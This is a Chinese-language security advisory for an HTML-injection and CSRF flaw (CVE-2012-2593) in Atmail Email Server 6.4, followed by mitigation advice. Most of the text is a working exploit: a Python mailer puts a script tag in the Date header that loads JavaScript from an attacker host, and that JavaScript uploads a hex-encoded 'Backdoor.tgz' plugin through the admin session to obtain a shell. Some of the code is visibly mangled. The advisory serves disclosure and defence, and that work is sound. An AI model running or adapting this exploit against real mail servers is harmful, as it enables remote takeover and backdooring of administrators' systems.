发布日期:2012-07-21
更新日期:2012-07-25

受影响系统:
@Mail Atmail Email Server 6.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54630
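CVE ID: CVE-2012-2593

Atmail是商业化Linux消息传送平台提供者。

Atmail Email Server 6.4在实现上存在HTML注入和跨站请求伪造漏洞,成功利用后可允许攻击者提供的HTML和脚本代码在受影响用户的浏览器中运行,执行非法操作,窃取基于Cookie的验证凭证或控制站点外观。从下文的测试方法可以看出,HTML注入点是邮件的Date头,注入的脚本随后借助管理员的登录会话向后台插件管理接口发出请求;这表明该接口很可能仅依赖会话Cookie,而没有校验请求来源(例如反CSRF令牌)。

<*来源:Muts (muts@whitehat.co.il)
*>

测试方法: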
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Muts (muts@whitehat.co.il)提供了如下测试方法:

#!/usr/bin/python
import smtplib, urllib2, sysdef sendMail(dstemail, frmemail, smtpsrv, username, password):
msg = "From: admin@offsec.local
"
msg += "To: admin@offsec.local
"
msg += "Date: <script src="http://172.16.164.1/~awae/atmail-rce.js"></script>
"
msg += "Subject: You haz been pwnd
"
msg += "Content-type: text/html
"
msg += "Oh noez, you been had."
msg += "
"
server = smtplib.SMTP(smtpsrv)
server.login(username,password)
try:
server.sendmail(frmemail, dstemail, msg)
except Exception, e:
print "[-] Failed to send email:"
print "[*] " + str(e)
server.quit()username = "admin@offsec.local"
password = "123456"
dstemail = "admin@offsec.local"
frmemail = "admin@offsec.local"
smtpsrv = "172.16.164.147"if not (dstemail and frmemail and smtpsrv):
sys.exit()sendMail(dstemail, frmemail, smtpsrv, username, password) function timeMsg()
{
var t=setTimeout("getShell()",5000);
}function getShell()
{
var b64url ="http://172.16.164.130/index.php/admin/plugins/add/file/QmFja2Rvb3IudGd6";
xhr = new XMLHttpRequest();
xhr.open("GET", b64url, true);
xhr.send(null);}
/**
 * Builds a multipart/form-data body by hand and POSTs it to `url` with an
 * asynchronous XMLHttpRequest.
 *
 * The body holds a single file part (field name `nameVar`, file name
 * `fileName`, part type `ctype`, content `fileData`) and nothing else.
 * No per-session or per-request token is read from the page or added to the
 * request, so an endpoint that accepts it is authenticating on the browser's
 * session cookie alone.
 * NOTE(review): the server-side fix for that is an anti-CSRF token check on
 * the receiving endpoint; confirm against the vendor's patched release.
 *
 * The multipart boundary is the fixed string "OWNEDBYOFFSEC". For defenders
 * that literal is a usable signature for this exact listing in request-body
 * or WAF logs, though it is not a reliable indicator on its own.
 *
 * @param {string} url      Target of the POST request.
 * @param {string} fileData File content placed in the multipart part.
 * @param {string} fileName File name written into Content-Disposition.
 * @param {string} nameVar  Form field name written into Content-Disposition.
 * @param {string} ctype    Content-Type written for the file part.
 * @returns {boolean} Always true; the response is never inspected.
 */
function fileUpload(url, fileData, fileName, nameVar, ctype) { var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
xhr.open("POST", url, true);
// Declare a multipart/form-data request and a length taken from the raw file
// data (not from the assembled body built below).
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "
";
body += "Content-Disposition: form-data; name="" + nameVar +""; filename="" + fileName + ""
";
body += "Content-Type: " + ctype + "
";
body += fileData + "
";
body += "--" + boundary + "--"; //xhr.send(body);
xhr.sendAsBinary(body);
return true;
}var nameVar = "newPlugin";
var fileName = "Backdoor.tgz";
var url = "http://172.16.164.130/index.php/admin/plugins/preinstall";
var ctype = "application/x-gzip";
//var ctype = "application/octet-stream";
//var data = "x44x41x42x43x44";
var data = "x1Fx8Bx08x00x44x7Ax91x4Fx00x03xEDx59xEDx72xDBxC6" +
"x15x55x3BxD3xE9x88xFFxDBxDFx1Bx8DxA6x22x27x24x48" +
"xF0xD3x96x2Ax27x34x2DxD9x9CxC8x92x86x94xE2x7Ax9A" +
"x0Ex67x05x2Cx49x8Cx40x00xC6x02xA2x99xD4xEFxD1xD7" +
"xE8x33xF5x45x7AxEEx2Ex40x91x16x4Dx53x89x46x69x63" +
"xDCx89x4Cx12xB8x7BxF7xE2xDCxAFxB3x88x51x36x06x67" +
"xC3xA1xF0xA4x73x23xFAxC2x8Ax43x27x9Ax6Dx3DxACx54" +
"x2Ax95x56xA3xC1xD4x67x53x7Fx56xAAx75xFDx49x52xAB" +
"xD7x98x69xB6xEAxF5x6AxABx61x56x4Cx56x31x1Bx66xB3" +
"xB5xC5x2Ax0FxECxC7x4Ax89x65xC4x43xB8x32x89x23xB9" +
"x4Ex0Fx6AxC3xE1x9AxFBxFAx51xD8xFCxF3xFFx45xFExF0" +
"xE7x3Fx6ExFDx7Ex6BxEBx35xB7xD8x59x9FxFDx8Dx25x42" +
"xD7xB6xB6xF1x57xC5xDFxBFxF1x47xBFxFFxB3x99xC9xF6" +
"xC5x45x2FxF9x4Ax2BxFEx85xBFxEFx3Ex52xF9xDDxEDxF5" +
"x3Fx59xFExC4xE0x41xE0x0AxE3x5DxCCx43xEEx45x8Ex27" +
"xB6xDEx95x81xA2x79x50x1Fx3Ex35x1Bx95xE6xD3x83xFE" +
"xF5x2Cx10x07xB5x17x4Fx6Bx4FxDBx95x4ExA9xF2xE2x69" +
"xA7x54x6Fx77x9Ex97x9Ex3Cx7DxF2xBCx74xD4x79x7Ex7C" +
"xDCx32x6Bx95xBAx79xF4x4FxB2x27x49x5DxFFxFBx00x18" +
"xFDx86xE5x4ExEDx97x1Fx7Ex8FxCFxD5x3FxD5xCBx72xFD" +
"xD7x9Bx54xFFx8Dx87x77xE5xAEx7CxE1xF5x7Fx37xFExC6" +
"xE0x39xB7xAEx6DxDFx0Fx1Fx6Ax8Fx7BxF4xFFx7AxB3x45" +
"xF1x6Fx36x5Ax66xD6xFFx1Fx45xB2xFExFFx45xCBxDDxFA" +
"x4FxABxFFxE1x06xC1x3DxFAx7Fx5AxFFxF5x6Ax33xEBxFF" +
"x8Fx21x6BxE2x6Fx0Cx1CxCFx72x63x5BxACxC5x65x03xB9" +
"x4FxFFx6Fx55x6AxACx52xADxD4x5AxB5xACxFFx3Fx8Ax64" +
"xFDxFFx8Bx96x35xF5x9Fx56xFFx2Fx1Ex04xF7xE9xFFx49" +
"xFDx57x6Bx95xACxFFx3Fx86xACxEDxFFxE7x6Ex3Cx72x3C" +
"x23x18x07xBFx68x0FxE0xD1xACxD7x37x7BxFFx53x69xA8" +
"xF8x37x2Bx8DxACxFFx3Fx8Ax64xFDxFFx8Bx96x35xF5xFF" +
"x40xD5xFFxD9xFAx37x1BxD5xD6xC7xF5x5Fx6Bx65xF5xFF" +
"x28xF2xD7x6Fx10xDFx9CxE5x72x29xD9x9Dx5Cx98xBFx09" +
"x4Ax26x01x13xEFx23xE1xD9x92xB5xA3x09x77xDCx41xC7" +
"xF7xA2xD0x77x5Dx91x2AxE4x7ExCAx6Dx07xA1x1Fx09x2B" +
"x12x36xDBx1Dx04xEAxEAx71xECxBAxA7x7Cx22xB6xB7x0F" +
"xD9x5Ex6Ax72xEFx60x95x6AxC7x9Fx04xDCx9Bx29xCDx3B" +
"xEExACx5ExD2x8ExA3xB1x1Fx2ExAFx60xE9x12xE6x78x43" +
"xFFx5Bx3FxBDx5Ex92xC9x75x03x4DxE2x53x1Ex04xB3xD0" +
"x19x8Dx23x65x91xB2x82x96x63xDDxA7x97x5Cx86xEExB6" +
"xD2x9Ex4ExA7xC6x7DxF6x3AxC5x05xA9x97xAEx56xF8x5E" +
"x84xD2xF1x3DxA5x51x31x2Ax86xB9x5AxEDxB5x6FxC7xAE" +
"x86x97xE2xB2x06x5AxFDx54x4DxC3x34x9Ax8CxFEx6Dx91" +
"x2ExB4xE3x2BxD7xB1xD8x30xF6xACx08xFBxB1xC1xC0xF2" +
"x3Dx19x85xB1x15xE5x0BxB9x6Dx44x75x3BxE0xA1xF0xA2" +
"xFDxFDxA5x5Bx58xBCxBDx1Bx8Dx1Dx59x7Ax96xECxF2x42" +
"x48x2Bx74x02x65xE5x90xEDxBCxE2xA1x6DxF9x36xDCx40" +
"x9Ax95x26xBEx77x2Dx66x2Cx14x37x78x2ExC1xE4x58xB8" +
"x2Ex22x24x1Dx5Bx7CxB5x03x5Bx1Fx56xF9x22x45x14x07" +
"xA9x17x6AxC9x40xBCx17x56x7Ex0Fx16x59x39x96x61xD9" +
"xF5x2DxEEx96xB9xCAxC9xF2x54x5CxA9x4Fx9Ax28x8ExC5" +
"xC9x44x79xA2xF0x91x65x75x43xFBx29xCBx9Bx30x5Fx72" +
"x3AxF1xB6xA4xB6xA6x6ExC8x9ExB1xB2x2Dx6ExCAx1ExD2" +
"x9Ax55x9FxDDx7ExFFxCBx1Ex01xF2x61x3BxF7x21xF7x6B" +
"x97xF5xC6xB2x09x0AxC6x60x25x0Ex1BxEFxB1x39xFFxAB" +
"xB7xEAxB5x26xFAx7FxBDx41xEFx7FxB2xFExFFx08x92xF1" +
"xBFx2Fx5Ax7Ex76x17xBCxC7x1ExEBxEBxDFxACx36x9AxAD" +
"x8FxEBxBFx56xADx67xF5xFFx18xA2xF9x5FxB9xCCxEEx04" +
"x99x95x58x9BxF5x92x51xDDxD7xA3x7Ax82x2Ax9Dx80x06" +
"xA8xB1x8AxC9xCDxCEx5Fx9DxD3xE2x39x69x62xF9x4Ex81" +
"x55x11x67x16x40x4DxC8x48x8FxFCx6Fx97x7Ex19x9Ex88" +
"xB0x8Ax16x5Ex80x3BxB0xC8xF7x5Dx36xE1x33x76x25x58" +
"x2CxC1x15x86x7ExC8x5Cx31xE2x2Ex0BxE2x30xF0xA5x90" +
"xCCxF7xDCx99xC1xD8xA5x84x3Bx2CxE2xD7x02x04x01x1E" +
"x85x42x06xA0x23xCEx95xE3x22x77xC9x22xADx05x83x64" +
"x5CxB1x07x09x3Fx42x5Cx9AxC0x6Ax2Cx1Dx6FxC4xA2x74" +
"x47x58xBBx18x0BxC6x15x7Dx84xBAx25x82x48x32xCFx67" +
"xAExC3x97xCDxD9x7CxC2x47x82x59x5Cx39x77x35x5BxB2" +
"xD1x1DxE2xA7x00x44x91x08x27x92x81x25xC1x46x94xD8" +
"xE3x57x2Ex6ExF8x6CxE6xC7x45x52xF3xC8xA4xEDx2Bx8D" +
"x98xD6xCCx0Dx25x78x74x3DxC6xF1x58x3Ex74x43xF5x70" +
"xE0x70x92x56xB2x97xE7x27xECx46xD3x41x56x65x8AxDD" +
"x08xB9xBFx08x23x28xDFx28xE4x13x86xAFxC3x50x80x5E" +
"xF9xC3x68x0Ax7Fx0Ex68x7Bx78xEFxC1xA0xEDx80xBAx39" +
"x57x71x24x98x03x27x3DxBBx8CxE7x03x3Dx72x86xEAx69" +
"x71x2DxF6x6Cx6Cx4Dx3BxEAx07xF2x87x7AxFBxD3x4BxF6" +
"x52x78x22x44x50xCEx35x43x3Bx71x2CxB4x0ExB1xE8x95" +
"x54x99x44xB7x91x42x09x54x82x1Dx93x37xFDxC4x1Bx76" +
"xECx63x0Bx95x40xC6x27xBCxBFx75xD2xA6x1Cx23x13x63" +
"x3Fx20xB4x78x44x2Ex4Ex1Dx40xA4x73x05x49x50x24x13" +
"x50x66x6FxBAx17xAFxCEx2Ex2Fx58xFBxF4x2Dx7BxD3xEE" +
"xF5xDAxA7x17x6Fx0FxA0x8CxF8xE2x2Ex12x59x9BxA2x24" +
"x76x60x19xCExD0xB0x99xE1x09xC9xC2xEBxA3x5ExE7x15" +
"x96xB4x9Fx77x4FxBAx17x6Fx19x70x39xEEx5Ex9Cx1ExF5" +
"xFBxECxF8xACx87x52x38x6FxF7x2ExBAx9DxCBx93x76x8F" +
"x9Dx5FxF6xCExCFxFAx47x88x7Ex5Fx90x5Bx82x0CxACx41" +
"x68xA8x40xC6xB3xDBx22x02x05x95xE9x83xBFx45x5Cx24" +
"xBCx73x6Dx36xE6x38xB5x84xC2x12x68xC5x36xE3xCCx42" +
"x45x6Dx80x3Dx77x7Dx6Fx44xA6xE8x31x75x3Ax25x40x1E" +
"x30x67x48x79x56x64x53xB4x75x95x85xEBx62x51x44xEA" +
"x59x86xC2xB2x61x42x8Bx7BxD7x2ExB0xEFx47xD0x87x8D" +
"x63x67x08xFBxC7x2ExE6x42x91x3DxF7x65x44x2Bx5ExB7" +
"xD1xAAx4DxB3x52xC2xE0x35xD9x65xBFx6DxFCx4Fx54xF5" +
"x26x15x49x36xE7x45xB9xB6x22x29x46x64x42x78x96x1F" +
"x87xE8x03x36x41x29x71x0Cx46x8Cx26xD4x0Cx65x91x72" +
"x2AxF4x6Fx54x6Bx94x94x39x32x1Ex8DxD0xEEx94xABx7A" +
"xB3x09x62x15x6DxD8x14x17xCEx50xF4xB3x74x2Bx73x70" +
"xB5x82xAEx84x09xE1x86xEAx46x96x5Fx51x3CxD9x45xE7" +
"x1CxBEx79x9ExD0x07x28xB8xCBx91x5FxE9x41xACx7Bx4E" +
"x75xCFx02x3Fx8Cx0Cx6Dx4Fx25x9Ex13x38x70x67x5Ex5B" +
"x23x87xEAx85x27x67xB4x30xF6x3Cx82x99xEBx5Ex04xA6" +
"x40x87x41x02x2Cx64x79x1Ex70x6Bx4Cx18x87x13xF4xAE" +
"x59x21x45xEExC4x99x38x7Ax52xC8x15x8Fx01xC0xACx01" +
"xAAxDAx53xDExA0xE0x05x9Fx0Cx70xD6x1Bx5CxE1x38x77" +
"x4Dx9Bx85xE2x5DxECx00x79xCCx98x79x8FxA9x1BxB5xAF" +
"x8Bx84x70xE3x6Bx32x82xC4xA1x22x99xAFx76x05x9Dx4A" +
"x91x56x6CxE8xB8x54x6Ex1Ax27x1FxD9x15xE2x18x19x7A" +
"xBAx29xCDxF7x86xAEx7AxE0x21xAAx52xF9xA1xB5xD8x71" +
"xFBxA4x7Fx94xB4xC2x37x8Ex67xFBx53x55xB3x28x1CxC4" +
"x11x61x0Fx60xBDx14x39xF8xE1x07x3AxCAx2AxCBx84xB0" +
"x93x3CxB7xB9x40x58x1DxA9x07x65xDEx75x10xA2xC0xF2" +
"x22xB7x08xE0xA5xF3xBExA0xA7x0Fx55x30x16x86xF8xC7" +
"x45x72xDFxC0x0Dx4AxD0x14xC1x4Bx89x7Cx9Bx63xA7x1C" +
"x40xF5x8ExA3x28xD8x2Fx97xEFx64x4Fx99xD2x76x05x5B" +
"xA3x46x40x13x60x24x22x20x15x5BxD7x46x2Ex47x40x93" +
"xFFx03x97x82xC4xF2x15x9Cx5Cx77xBFx3FxEAxF5xBBx67" +
"xA7x74x6Ex37x8Dx0Ax0ExE4xBBx4Ex80x1Fx7Bx66xABx6A" +
"x98x4DxE3xC9x13xC3xACxD5xF7x0Ex18xA3x89x8Fx5ExF9" +
"xF2x88x5DxBCxEAxF6x73xBBx94x4Bx50x34xABxB5xFAx41" +
"x72x7ExF8x58xC5x1AxC7xDExF5x40x3Ax3Fx0Ax52xACx57" +
"x2AxB0xAEx1AxD3x80xE3x02x1Dx9Fx71x41x84xA1x1Fx2E" +
"x5ExD0xFExC3x85xD8xE3x00xBBxC4xD1xCFxD1xD8xECx03" +
"x56xBEx72xBCxB2x1CxB3x92xB3x07x3Dx0Dx37x14xC9xAC" +
"x2DxAExE2x91xFEx9Ex16x54x12x0Dx84x2Bx06x2CxEEx90" +
"x20x41x1CxD0x61xF4x7CxE6x37xBEx63xB3x1FxFDxC9x15" +
"x86x2Ax73x39x3Ax07x2Dx55x79x4Ax51x1Bx20xA6xD7x34" +
"x9AxA8x8Cx10x29x82xF7x36x5Cx45x35x7Ex54x22xA1x00" +
"xFCx29xEAx82x8CxA6x39xA0x22x88x8Dx89x62xA9xD4x13" +
"x52xAAx64x5BxDAx15x09xF1x06x30x8Ex51x73x51x38x33" +
"x0Cx23x07x1FxF3xE9x5Bx90x81x78x8FxA1x28xF3x7BxB7" +
"xEExECx15x0AxECxA7xDCx36x6Cx1Fx93x73x64x50x0Dx11" +
"x2Ax50xFDxB2x66xBEx19x16x47xB9xEDxDDx00xBBx1Dx2E" +
"x3Cx90x7Ax7Fx93xDBxA6x7DxF4xBDx43x56x32x95xD1xED" +
"x20x74x70x0Ex8BxF2x3Bx47xBDxDEx59x6Fx9Fx75xB8xB7" +
"x17x51x66x5FxEFxA8x97x3Ex64x31x6Fx16xD2x77x36xA9" +
"x09xBDx58xDDx44x46xA9x2Cx38xD7xAExD0x35x49xDAxCA" +
"xE3xD7xD4xB2x16x3BxC9x1Cx16x74x56xA9x2AxDDx15x1C" +
"xD5xA7xB4xDFx10xB2x34x2AxD0x57xD1xC4x89x15x0CxD9" +
"x54x8DxD5x6Bx61xEBxDDx55x55x51xFFx90x8Ex8DxAAx5E" +
"xF9x28x94x5DxE9xA3xA4x9Ax77x1Fx07x40xCDxD3xC9x3C" +
"xC8x7Dx60xC2x45xE2xA8x17x9Bx89x21x90x8BxD3xEExE9" +
"xCBx7Dx76x8Cx04xD0xF3x60x1Ex6Bx55xD7x48x14xFCx87" +
"xEEx15xA9x6Ex41xB6x28x3Cx34x63x86x3CxE2xAEx41xBB" +
"x7Ex50xE9xD5x19x73x6FxA4x73x90x49x3Ex44xCFx42xCB" +
"xB3xD0xB1x66x39x6Bx8CxEFxF9x9Dx32x29x93x6Ax0Fx5B" +
"xDCx08x35x06xE3x09x97xD7x04x81xE3x81x28x62x1Bx3B" +
"xA7x2ExA9x3Ax4Ex93x5Ex0FxFCxA5x97x6Dx94x56x49x5E" +
"x9Fx51xEBx4Dx6FxDEx4Ex0BxD4x1CxDAx2Fx1Ex7Dx48x9F" +
"xAAx47xA2x0Bx14x99xAAx71x7CxA0x44x3Dx5Fx7FxA2xEB" +
"x16x59x8Dx76xA4x00x7CxA5x16x16x96x80x4AxB4x90x1B" +
"x6Ax99x06x7Bx8ExB5x06xA0x1FxF0xA9x97x8Cx99x24x0B" +
"xA8x84xE7x8Dx1Bx0Cx18xDEx10x57x9BxE5x73x68x2Cx15" +
"x76xF8x2CxF9xB9x13x38x81xD8x29xB2x9Dx70xA7x50x54" +
"xC9x26x23x1BxA4xC5xA1x3CxA2x7Bx9Ax31xAAx3Cx1Bx3B" +
"x20x59xAAx44x31x2AxD0xA3x43x7Fx42xD6xCCx15xD6xA6" +
"x0BxD6x88x39xAEx37x97xB2x2BxB2x56x5Dx6Dx8DxA5xD6" +
"x80xC2xA6xD6x28x8ExBBx69x55x1Cx2Ex4Cx2CxDDx13x11" +
"x81x65x8Cx28x42x30x2Ax69x9Dx0Ax87x23x07xA0x51x68" +
"x3Bx96xC8xA7x86x0AxCBxE1x59xAAx6Dx79x1Bx87x95x61" +
"x12x8Ax42x87x33x10x24xE2x5BxC4x98xBCx52x3AxABx75" +
"x7Ax72xE9x7BxFBxECxCCxB2xA8x80x89x0Ax28xACx65xC2" +
"x29x48xB5x98xD2x70x3Fx1Ex8Dx97xC7x36xD8x9AxEBx4A" +
"xD5x3AxC7x62xC6xA6x3Ex9CxCAxADxA0x05x79xFDx9Cx7F" +
"xAFxFCxA3xC8x28xF7xD6xA8x98x9Fx57xA9xAEx53x91xCA" +
"x63x55x52x73xCCxFAxD4x81xA4x24x9Ax0Ax7Ex8Ex80x08" +
"xFBxA3xF7xD9x80x06x15xB3xAFx0Ax46x95xEEx74x4Cx5C" +
"x24x6FxA6xEDxBAx33x16xA8x30x62x09x44x22x41x5Fx96" +
"xF9x9AxEEx67x43xE1x0FxB5x07x85xD5x1Dx59x9FxC8x17" +
"x69x1ExD8xAExE3x61x74xD9xBAxA7x5DxE1x89xAEx0FxE6" +
"x2DxF7xCExAExFDx8Bx17x38x2Dx2DxEEx96xA2xB6x76xC7" +
"x34x27x3FxB3xDDx1BxAExCEx92x11xF1x2AxD5x03xA9x01" +
"x22xF7x69x73xD0x29x8Fx25xE8x12x59x06xA9x52x6Bx52" +
"x35x14x5Dx90xD4x5Dx3Ax62x89xD2x69x87x69x05xBExC1" +
"x27x34x6AxCAx2FxC5x17x74xD1x25x36x17xC2x3Fx0Fx33" +
"xF9xB8xEBxC5x93x81xA5x1AxAEx3Dx20x55xCCx00xACx5D" +
"x66x8Fx89x4Dx2Cx4DxE8x89x6Ex76xC4x4Bx8Ax8Ax96x50" +
"x48xC9xDBxAEx9Ax41xFAx58x9Dx74x14x55xCDx14x4Dx6D" +
"xBCxA8x8Ex09x4Ax19x87x2Cx4Ex99x91xA0xB7x27xE9x19" +
"xBAxA7x1Ax7DxC7x1Bx2CxFBxAFx5Dx48xC2xA0x66xABxE2" +
"x34x05x76x9Bx86x67x9DxEFx58xEFxA8xFDx42x83xBFxEB" +
"x78x84xD8x21x1DxFCxB9x3DxB7x73x4BxBAx94xD6x27x2D" +
"xEDx33x6Dx40x1Bx1BxAAx07x5FxACx33x7DxB7x70x1BxDD" +
"x4Fx3DxFBxD2xE3xA9xECxA2xC6xA7x62x4Ex00xA8xC0x47" +
"x56x70x27xDBx6Fx11x58x08xDDx06x28xE8x8CxF8x34x0E" +
"x0BxD6x36xC2x42xD9x5Bx8Dx46x02xE9xCFx42x42x25xEB" +
"xCFx43xA2xBAx31x12xD8xE4xB3x48x54xEFx81x04xECx6D" +
"x8Ax04xB0x18x5Ax2Ex4ExF4x49xC7x3Ax98xFFx4Cx73xE8" +
"xCEx25xF3xEEx25x55xA4x6AxD0xA5x97x93xA9xA5xE9xCF" +
"x89x3Ax43x91x83x9Ax6FxDBxBExA0xD7x75x7Ax1Ex29x42" +
"xB8x07x76x34x27x62x76xCAxF5x69x6DxBEx4Bx21x22x06" +
"xEBx8CxE2x90x8Ex01x11x1Bx83xA8xA3x22xE9x9Dx18x31" +
"xAExB4xBDxA8xA3x1AxA7xF8x05x22x3DxC7x15x72xF3xFF" +
"x1Bx99x20x04xC8xE8x1Dx95x37x52x31xD1xFCx27xD1xBD" +
"xEDx9Dx6Cx27x51xFAxC1xDBx49x71xFAxE6x19xCBx41x7E" +
"xEDxD7xBEx99x64x92x49x26x99x64x92x49x26x99x64x92" +
"x49x26x99x64x92x49x26x99x64x92x49x26x99x64x92xC9" +
"x6Fx58xFEx0Bx3ExE1xD0x84x00x50x00x00";// UPLOAD THE THINGIE...
fileUpload(url,data,fileName,nameVar,ctype);
timeMsg();

建议:
--------------------------------------------------------------------------------
厂商补丁:

@Mail
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.securityfocus.com/bid/51313/www.atmail.com

在厂商补丁发布之前,可考虑以下临时缓解措施:不要在已登录管理后台的浏览器会话中阅读邮件;限制可访问 /index.php/admin/ 路径的来源地址;在邮件网关上对邮件头字段中出现的HTML标签进行过滤或告警。